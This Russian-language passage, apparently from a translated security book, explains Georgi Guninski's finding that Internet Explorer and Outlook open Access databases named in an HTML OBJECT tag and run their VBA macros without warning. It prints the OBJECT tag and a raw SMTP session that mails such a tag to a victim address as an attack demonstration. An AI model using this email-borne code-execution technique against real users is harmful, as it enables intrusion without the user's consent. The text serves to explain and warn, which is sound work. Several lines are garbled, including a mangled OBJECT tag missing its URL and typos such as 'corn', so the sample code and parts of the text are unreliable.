"Запуск" документов



"Запуск" документов MS Office с помощью элементов ActiveX

Георгий Гунински не ограничил свои изыскания использованием дескрипторов HTML в электронном сообщении для загрузки потенциально опасных элементов управления ActiveX. В последующих информационных сообщениях, опубликованных на его узле, сообщается, что с помощью этого же метода могут быть "запущены" и потенци-ачьно опасные документы Microsoft Office ("поведение" этих документов очень похоже на поведение элементов управления ActiveX). С результатами исследований можно ознакомиться по адресу http://www.nat.bg/-joro/sheetex-desc.html (для документов Excel и PowerPoint) и http://www.nat.bg/~joro/access-desc.html (здесь описывается процедура запуска кода VBA, содержащегося в базах данных Access).
Руководствуясь двумя соображениями, в этом разделе будет рассмотрена вторая из этих возможностей. Во-первых, вопросы, связанные с Excel и PowerPoint, более интересны ввиду способности этих приложений незаметно записывать файлы на диск, что будет обсуждаться в последующих разделах. Во-вторых, изъян, основанный на использовании Access, по мнению большинства специалистов в области обеспечения безопасности, является более серьезным, поскольку справиться с ним не помогают все те меры предосторожности, которые применяются для защиты от элементов управления ActiveX. Даже если полностью запретить их использование, система все равно остается уязвимой. Вот как высоко оценили серьезность этой проблемы специалисты института SANS: "Возможно, это одна из самых опасных ошибок, допущенных компанией Microsoft в программах для рабочих станций Windows (всего ряда — 95. 98, 2000, NT 4.0)". Грустно, что это замечание, которое на первый взгляд наполнено сенсуализмом, на самом деле может оказаться не так далеко от истины.
Проблема заключается в том способе, который в системе Windows используется для проверки файлов Access (.MDB) при их загрузке в Internet Explorer с помощью дескриптора OBJECT, как показано в следующем фрагменте кода HTML, предоставленного Георгием Гунински.

OBJECT data="db3.mdb" id="dl"></OBJECT>

Как только программа Internet Explorer встречает дескриптор объекта, загружается база данных Access, имя которой задано в параметре data=, а затем для ее открытия вызывается программа Access. Это происходит перед тем, как пользователь получит предупреждение о потенциальной опасности, которая при этом может возникнуть. Таким образом, база данных будет запущена независимо от того, настроен IE/Outlook/ОЕ для запуска элементов управления ActiveX или нет. Ну и дела!
Пример Георгия основан на применении удаленного файла с именем db3.mdb, который он разместил на своем Web-узле. Этот файл представляет собой базу данных Access. где находится одна форма, запускающая текстовый редактор Wordpad. Вот еще одна капсула для взлома электронной почты, демонстрирующая, как можно реализовать эту атаку.

helo some domain, corn
mail from: <mallory@attack.net>
rcpt to: <hapless@victim.net>
data
subject: And another thing!


Importance: high
MIME-Version: 1.0
Content-Type: text/html; charset=us-ascii
<HTML>
<h2>Enticing message here!</h2>
id="dl"x/OBJECT>
</HTML>
quit

В этом примере явно задан URL файла db3.mdb (строка 12), чтобы можно было использовать его в сообщении электронной почты. Институтом SANS было выдвинуто требование, чтобы при доступе и совместном использовании файлов Access через Internet применялся протокол SMB. Просто поразительно, сколько FTP-серверов предоставляет свои ресурсы для бесконтрольного размещения данных и доступа к ним. В следующих разделах указаны другие места хранения данных, которые могут заинтересовать взломщиков.
Основной особенностью атак этого типа является то, что обработка этих простых дескрипторов программами IE/Outlook/ОЕ приводит к запуску файлов, в которых содержится мощный макрос VBA. При этом не требуется какого-либо вмешательства пользователя. Неужели такая перспектива еще никого не встревожила?

Содержание раздела